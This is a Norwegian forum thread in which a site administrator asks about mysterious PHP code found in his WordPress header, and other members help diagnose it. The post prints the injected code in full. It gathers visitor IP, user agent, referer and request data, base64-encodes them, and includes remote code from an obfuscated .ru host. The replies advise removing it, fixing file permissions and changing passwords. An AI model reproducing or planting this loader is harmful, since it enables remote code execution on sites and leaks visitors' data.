Mystisk kode i header

Tonny Kluften

Tonny Kluften

Administrator
Fant denne koden i header på en side jeg har. Aldri sett koden før, oppdaget den i dag. Hva i alle dager er dette?

Kode: 
<a href="<?php bloginfo('home'); error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==")."jjbazzazbzgf".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==")."jjbazzazbzgf".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str);}?>">HJEM</a>
 
Sist redigert:
Helge

Helge

Profesjonell Googlesøker
Dette er nok fordi du har en eller annen fil/mappe som er chmodet til 777 (fyfy!)

aHR0cDovLw = http://

og det andre er en eller annen nettside som laster inn ett eller annet.
 
picxx

picxx

WF 09
base64 er php koding.
Ville slettet dette fortere enn kjapt hvis det er noe nytt som er kommet til i filen.
 
webpiken

webpiken

Medlem
Jeg husker det var mye styr med dette for noen år siden, da var det ofte bilde-kataloger med 777 de kom inn via.

Du burde nok se deg litt rundt, for såvidt jeg husker la de noen .htaccess-filer rundtforbi også.

Jeg ville også byttet passord når jeg hadde tatt bort det jeg fant.

Uansett, Google er jo din venn om du vil vite mer
 
Sist redigert:
Helge

Helge

Profesjonell Googlesøker
alle mapper kan være 755, og filer skal helst være 666/644
 
Du må logge inn eller registrere deg for å svare her.
Topp